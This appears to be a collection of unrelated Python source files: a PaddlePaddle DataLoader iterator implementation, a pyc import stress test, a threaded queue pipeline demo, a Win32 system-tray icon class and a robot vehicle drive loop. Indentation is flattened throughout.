# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
try:
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices)
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
if self._thread_done_event.is_set():
break
self._blocking_queue.close()
self._shutdown_thread()
except StopIteration:
self._blocking_queue.close()
except Exception:
self._blocking_queue.kill()
self._shutdown_thread()
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def __next__(self):
try:
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes data on multiple devices with a list; if
# place number is 1, there is only 1 device, so extract the data
# from the list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
six.reraise(*sys.exc_info())
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def __del__(self):
# _blocking_queue in keep order mode holds sub-threads
# need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
# NOTE: blocking queue should be closed firstly for
# blocking queue read may hang and _thread_done_event
# cannot be checked
self._shutdown_thread()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess workers' result queue
self._data_queue = None
# data fetched from _data_queue will be reordered by _rcvd_idx
# to keep data order; data whose index does not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# outstanding indices start at _outstanding_capacity, and the
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here makes sure each indices_queue
# has at least 2 indices, and that outstanding batches cache
# output data for at least 2 iterations (note that len(_places)
# batches will be composed as one iteration's output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indices queue lists are initialized as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# events for workers and thread; the thread event is only needed
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# thread event is only needed in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all workers as the resume-iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
# all flags will be checked in _thread_loop, simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
# the blocking_queue caches instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# _workers_done_event should be set before putting None
# into indices_queue; workers will exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# a LoDTensor not in shared memory is not
# serializable and cannot be created in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices are generated infinitely
# for each worker until it raises StopIteration, but a worker
# that raises StopIteration will discard a batch of indices which
# is counted in _send_idx but will not increase _rcvd_idx, so we
# check whether the worker is still alive here to skip the
# discarded batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: in persistent workers mode, do not check whether data
# is drained here; simply let it go on to the _data_queue
# read to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers; if the batches among workers are drained, there
# may still be data in the blocking queue
if self._batches_outstanding < len(self._places):
return None
continue
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: the main process may block at _reader.read_next on
# KeyboardInterrupt, so we make the following tradeoff:
# 1. get data with a timeout, MP_STATUS_CHECK_INTERVAL (5s) by
#    default; if blocked by KeyboardInterrupt, failed workers will be
#    checked and a RuntimeError raised to quit DataLoader in the
#    timeout exception handling.
# 2. if getting data times out and all workers are alive, continue to
#    get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker gets StopIteration, we shut down this worker;
# note that the batch indices that triggered StopIteration
# are discarded, so the outstanding batch number should be
# decreased and another set of indices should be put, since
# other workers may still be working.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in the main process (since our implementation has a
# blocking queue, and the blocking queue read is in the main process)
# and in the thread, which may cause the following errors:
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-entry when increasing _send_idx
# Add a lock for thread safety; since _try_put_indices is only a
# lightweight function that is not in the data reading pipeline, this
# lock has almost no influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
try:
# _batches_outstanding here records the total number of batches
# from 'after _try_put_indices' to 'before output data'; this
# value should be _outstanding_capacity if data is not drained.
# If _batches_outstanding is less than the number of _places, there is
# not enough data to generate the next output, so close blocking_queue
# and set _thread_done_event here; py_reader will raise StopIteration,
# and workers and indices_queues are ended in the StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organizes data on multiple devices with a list; if
# place number is 1, there is only 1 device, so extract the data
# from the list to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
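# --- Editor-added usage sketch (not part of the original module) ---
# A minimal, hedged illustration of how these iterator classes are exercised
# through the public DataLoader API, assuming a Paddle 2.x installation.
# num_workers=0 selects _DataLoaderIterSingleProcess; num_workers>0 selects
# _DataLoaderIterMultiProcess. The RandomDataset below is hypothetical.
#
#     import numpy as np
#     import paddle
#     from paddle.io import Dataset, DataLoader
#
#     class RandomDataset(Dataset):
#         def __len__(self):
#             return 64
#
#         def __getitem__(self, idx):
#             image = np.random.random((3, 4)).astype('float32')
#             label = np.array([idx]).astype('int64')
#             return image, label
#
#     loader = DataLoader(RandomDataset(), batch_size=8, shuffle=True,
#                         num_workers=2, drop_last=True)
#     for images, labels in loader:
#         pass  # each element is a batch restored via _restore_batch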
|
pyc_stress_test.py
|
# Note: CPython doesn't pass this test
import os
import sys
import multiprocessing
def worker():
global done
for i in xrange(100):
del sys.modules["pyc_import_target"]
import pyc_import_target
done = True
import pyc_import_target
path = os.path.join(os.path.dirname(__file__), "pyc_import_target.pyc")
assert os.path.exists(path)
TEST_THREADS = 3
l = []
for i in xrange(TEST_THREADS):
p = multiprocessing.Process(target=worker)
p.start()
l.append(p)
idx = 0
while l:
p = l.pop()
while p.is_alive():
for i in xrange(10):
if os.path.exists(path):
os.remove(path)
for i in xrange(10):
if os.path.exists(path):
with open(path, "rw+") as f:
f.write(chr(i) * 100)
f.truncate(200)
p.join()
assert p.exitcode == 0, p.exitcode
|
test.py
|
from multiprocessing.dummy import Process as Thread
from multiprocessing.dummy import Queue
import time
def func1(qm1, q12):
while True:
qget = qm1.get()
if qget is not None:
if qget == 'over':
q12.put('over')
break
print ('Thread1 recv: %s'%qget)
q12.put('1_%s'%(qget))
time.sleep(1)
def func2(q12, q23):
while True:
qget = q12.get()
if qget is not None:
if qget == 'over':
q23.put('over')
break
print ('Thread2 recv: %s'%qget)
q23.put('2_%s'%(qget))
time.sleep(0.7)
def func3(q23, q3m):
while True:
qget = q23.get()
if qget is not None:
if qget == 'over':
q3m.put('over')
break
print ('Thread3 recv: %s'%qget)
q3m.put('3_%s'%(qget))
time.sleep(1.3)
def main():
qm1 = Queue()
q12 = Queue()
q23 = Queue()
q3m = Queue()
t1 = Thread(target=func1,args=(qm1, q12))
t2 = Thread(target=func2,args=(q12, q23))
t3 = Thread(target=func3,args=(q23, q3m))
t1.start()
t2.start()
t3.start()
for i in range(100):
qm1.put('%d'%(i))
print ('Main send: %d'%i)
time.sleep(0.5)
qm1.put('over')
result = []
while True:
qget = q3m.get()
if qget is not None:
if qget == 'over':
break
result.append('m_%s'%(qget))
print ('Main recv: %s,%d'%(qget, len(result)))
t3.join()
t2.join()
t1.join()
if __name__ == "__main__":
main()
|
systrayicon.py
|
import os
import threading
import uuid
from copy import copy
from .win32_adapter import *
class MenuOption:
def __init__(self, text, icon_path=None, callback=None, submenu=None):
self.text = text
self.icon_path = icon_path
self.callback = callback
self.submenu = submenu
self.ftype = None
self.fstate = None
self.action_id = None
self.menu_handle = None
self.menu_position = None
def refresh(self):
pass
class CheckBoxMenuOption(MenuOption):
def __init__(self, *args, check_hook=None, **kwargs):
super().__init__(*args, **kwargs)
self.check_hook = check_hook
self._checked = False
self._get_checked()
def refresh(self):
self._get_checked()
if self.menu_handle is not None:
menu_item_checked = GetMenuState(self.menu_handle, self.menu_position, MF_BYPOSITION) & MFS_CHECKED
if self._checked != menu_item_checked:
u_check = MFS_CHECKED if self._checked else MFS_UNCHECKED
CheckMenuItem(self.menu_handle, self.menu_position, MF_BYPOSITION | u_check)
def _get_checked(self):
if self.check_hook and callable(self.check_hook):
self._checked = bool(self.check_hook())
@property
def fstate(self):
self._get_checked()
return MFS_CHECKED if self._checked else MFS_UNCHECKED
@fstate.setter
def fstate(self, value):
return # Does nothing
class SysTrayIcon(object):
"""
menu_options: list or tuple of MenuOption objects or tuples of (text, icon_path, callback)
text and tray hover text should be Unicode
hover_text length is limited to 128; longer text will be truncated
icon_path can be None
callback must be a callable or special action from SysTrayIcon.SPECIAL_ACTIONS
Can be used as context manager to enable automatic termination of tray
if parent thread is closed:
with SysTrayIcon(icon, hover_text) as systray:
for item in ['item1', 'item2', 'item3']:
systray.update(hover_text=item)
do_something(item)
"""
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
icon,
hover_text,
menu_options=None,
on_quit=None,
default_menu_index=None,
window_class_name=None,
error_handler=None):
self._icon = icon
self._icon_shared = False
self._hover_text = hover_text
self._on_quit = on_quit
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = dict()
self._menu_options = list()
self._prepare_menu_options(menu_options)
window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
self._error_handler = error_handler
self._default_menu_index = (default_menu_index or 0)
self._window_class_name = encode_for_locale(window_class_name)
self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
RegisterWindowMessageW("TaskbarCreated"): self._restart,
WM_DESTROY: self._destroy,
WM_CLOSE: self._destroy,
WM_COMMAND: self._command,
WM_USER+20: self._notify}
self._notify_id = None
self._message_loop_thread = None
self._hwnd = None
self._hicon = 0
self._hinst = None
self._window_class = None
self._menu = None
self._register_class()
def __enter__(self):
"""Context manager so SysTray can automatically close"""
self.start()
return self
def __exit__(self, *args):
"""Context manager so SysTray can automatically close"""
self.shutdown()
def WndProc(self, hwnd, msg, wparam, lparam):
hwnd = HANDLE(hwnd)
wparam = WPARAM(wparam)
lparam = LPARAM(lparam)
if msg in self._message_dict:
self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
return DefWindowProc(hwnd, msg, wparam, lparam)
def _register_class(self):
# Register the Window class.
self._window_class = WNDCLASS()
self._hinst = self._window_class.hInstance = GetModuleHandle(None)
self._window_class.lpszClassName = self._window_class_name
self._window_class.style = CS_VREDRAW | CS_HREDRAW
self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
self._window_class.hbrBackground = COLOR_WINDOW
self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
style = WS_OVERLAPPED | WS_SYSMENU
self._hwnd = CreateWindowEx(0,
self._window_class_name,
self._window_class_name,
style,
0,
0,
CW_USEDEFAULT,
CW_USEDEFAULT,
0,
0,
self._hinst,
None)
UpdateWindow(self._hwnd)
self._refresh_icon()
def _message_loop_func(self):
self._create_window()
PumpMessages()
def start(self):
if self._hwnd:
return # already started
self._message_loop_thread = threading.Thread(target=self._message_loop_func)
self._message_loop_thread.start()
def shutdown(self):
if not self._hwnd:
return # not started
PostMessage(self._hwnd, WM_CLOSE, 0, 0)
self._message_loop_thread.join()
def update(self, icon=None, hover_text=None):
""" update icon image and/or hover text """
if icon:
self._icon = icon
self._load_icon()
if hover_text:
self._hover_text = hover_text
self._refresh_icon()
def _prepare_menu_options(self, menu_options):
menu_options = menu_options or ()
if isinstance(menu_options, tuple):
menu_options = list(menu_options)
menu_options.append(MenuOption('Quit', callback=SysTrayIcon.QUIT))
self._next_action_id = SysTrayIcon.FIRST_ID
self._menu_actions_by_id = dict()
self._menu_options = self._recompile_menu_options_with_ids(menu_options)
def _recompile_menu_options_with_ids(self, menu_options):
result = []
for menu_option in menu_options:
if isinstance(menu_option, tuple):
menu_option = MenuOption(*menu_option)
elif isinstance(menu_option, dict):
menu_option = MenuOption(**menu_option)
elif isinstance(menu_option, MenuOption):
menu_option = copy(menu_option)
else:
raise ValueError('Unknown menu option type', type(menu_option))
menu_option.action_id = self._next_action_id
submenu = menu_option.submenu or _non_string_iterable(menu_option.callback)
if callable(menu_option.callback) or menu_option.callback in SysTrayIcon.SPECIAL_ACTIONS:
self._menu_actions_by_id[menu_option.action_id] = menu_option.callback
elif submenu:
menu_option.submenu = self._recompile_menu_options_with_ids(submenu)
menu_option.callback = None
else:
raise Exception('Unknown item', menu_option.text, menu_option.icon_path, menu_option.callback)
result.append(menu_option)
self._next_action_id += 1
return result
def _load_icon(self):
# release previous icon, if a custom one was loaded
# note: it's important *not* to release the icon if we loaded the default system icon (with
# the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
if not self._icon_shared and self._hicon != 0:
DestroyIcon(self._hicon)
self._hicon = 0
# Try and find a custom icon
hicon = 0
if self._icon is not None and os.path.isfile(self._icon):
icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
icon = encode_for_locale(self._icon)
hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
self._icon_shared = False
# Can't find icon file - using default shared icon
if hicon == 0:
self._hicon = LoadIcon(0, IDI_APPLICATION)
self._icon_shared = True
self._icon = None
def _refresh_icon(self):
if self._hwnd is None:
return
if self._hicon == 0:
self._load_icon()
if self._notify_id:
message = NIM_MODIFY
else:
message = NIM_ADD
self._notify_id = NotifyData(self._hwnd,
0,
NIF_ICON | NIF_MESSAGE | NIF_TIP,
WM_USER+20,
self._hicon,
self._hover_text)
Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
self._notify_id = None
self._refresh_icon()
def _destroy(self, hwnd, msg, wparam, lparam):
if self._on_quit:
self._on_quit(self)
nid = NotifyData(self._hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
PostQuitMessage(0) # Terminate the app.
if self._menu:
DestroyMenu(self._menu)
if self._hicon:
DestroyIcon(self._hicon)
self._hwnd = None
self._notify_id = None
def _notify(self, hwnd, msg, wparam, lparam):
if lparam == WM_LBUTTONDBLCLK:
self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
elif lparam == WM_RBUTTONUP:
self._show_menu()
elif lparam == WM_LBUTTONUP:
pass
return True
def _refresh_menu_options(self, menu_options=None):
if menu_options is None:
menu_options = self._menu_options
for menu_option in menu_options:
menu_option.refresh()
if menu_option.submenu:
self._refresh_menu_options(menu_option.submenu)
def _show_menu(self):
if self._menu is None:
self._menu = CreatePopupMenu()
self._create_menu(self._menu, self._menu_options)
# SetMenuDefaultItem(self._menu, 1000, 0)
self._refresh_menu_options()
pos = POINT()
GetCursorPos(ctypes.byref(pos))
# See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
SetForegroundWindow(self._hwnd)
TrackPopupMenu(self._menu,
TPM_LEFTALIGN,
pos.x,
pos.y,
0,
self._hwnd,
None)
PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
for position, menu_option in enumerate(menu_options):
option_icon = self._prep_menu_icon(menu_option.icon_path) if menu_option.icon_path else None
item_attributes = dict(text=menu_option.text,
hbmpItem=option_icon,
fType=menu_option.ftype,
fState=menu_option.fstate)
if menu_option.action_id in self._menu_actions_by_id:
item = PackMENUITEMINFO(**item_attributes, wID=menu_option.action_id)
elif menu_option.submenu is not None:
submenu = CreatePopupMenu()
self._create_menu(submenu, menu_option.submenu)
item = PackMENUITEMINFO(**item_attributes, hSubMenu=submenu)
else:
raise ValueError('Badly configured menu option: no action or submenu found')
menu_option.menu_handle = menu
menu_option.menu_position = position
InsertMenuItem(menu, position, True, ctypes.byref(item))
@staticmethod
def _prep_menu_icon(icon):
icon = encode_for_locale(icon)
# First load the icon.
ico_x = GetSystemMetrics(SM_CXSMICON)
ico_y = GetSystemMetrics(SM_CYSMICON)
hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
hdcBitmap = CreateCompatibleDC(None)
hdcScreen = GetDC(None)
hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
hbmOld = SelectObject(hdcBitmap, hbm)
# Fill the background.
brush = GetSysColorBrush(COLOR_MENU)
FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
# draw the icon
DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
SelectObject(hdcBitmap, hbmOld)
# No need to free the brush
DeleteDC(hdcBitmap)
DestroyIcon(hicon)
return hbm
def _command(self, hwnd, msg, wparam, lparam):
_id = LOWORD(wparam)
self._execute_menu_option(_id)
def _execute_menu_option(self, action_id):
menu_action = self._menu_actions_by_id[action_id]
if menu_action == SysTrayIcon.QUIT:
DestroyWindow(self._hwnd)
else:
try:
menu_action(self)
except Exception as exc:
if self._error_handler and callable(self._error_handler):
self._error_handler(exc)
else:
raise
def _non_string_iterable(obj):
try:
iter(obj)
except TypeError:
return False
else:
return not isinstance(obj, str)
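# --- Editor-added usage sketch (not part of the original module) ---
# A minimal, hedged illustration of wiring MenuOption / CheckBoxMenuOption items
# into a SysTrayIcon. The icon path "app.ico" and the callbacks are hypothetical,
# and this only works on Windows since the class relies on Win32 APIs. Menu
# callbacks receive the SysTrayIcon instance as their single argument.
#
#     state = {"enabled": False}
#
#     def say_hello(systray):
#         print("Hello from the tray menu")
#
#     def toggle_enabled(systray):
#         state["enabled"] = not state["enabled"]
#
#     menu = [
#         MenuOption("Say hello", callback=say_hello),
#         CheckBoxMenuOption("Enabled", callback=toggle_enabled,
#                            check_hook=lambda: state["enabled"]),
#     ]
#     with SysTrayIcon("app.ico", "My application", menu_options=menu) as tray:
#         tray.update(hover_text="running...")
#         # ... main application work; the tray runs its own message loop thread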
|
vehicle.py
|
import time
from threading import Thread
from .memory import Memory
from .log import get_logger
import time
logger = get_logger(__name__)
# TODO
## Should add the ultrasonic sensor as a part
## The ultrasonic sensor code should be in its own class
## maybe have the thread return a value rather than have it set the shouldStop variable
## make n_times an argument to Vehicle() and a CLI argument to manage.py
## Look into how GPIO actually works
## Modify the behavior of when you detect an object
## Add a way to easily add a customized action based on object detected
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = [] # Turn this into an array where the name is the key
self.on = True
self.threads = []
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None, name=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition: boolean
If a part should be run at all.
"""
p = part
logger.info('Adding part {}.'.format(p.__class__.__name__))
entry = dict()
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
entry['name'] = name
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
def start(self, rate_hz=10, max_loop_count=None):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts, then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
logger.info('Starting vehicle...')
time.sleep(1)
loop_count = 0
#distance = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
"""
loop over all parts
"""
for entry in self.parts:
# don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
# print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
logger.info('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except Exception as e:
logger.debug(e)
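# --- Editor-added usage sketch (not part of the original module) ---
# A minimal, hedged illustration of the part interface Vehicle expects. The two
# parts below are hypothetical; a non-threaded part needs run() and shutdown(),
# and a threaded part would additionally need update() (the thread loop) and
# run_threaded(). Outputs returned by run() are written back to Memory under
# the channel names given to add().
#
#     import random
#
#     class RandomPilot:
#         def run(self):
#             return random.uniform(-1, 1), 0.3  # steering, throttle
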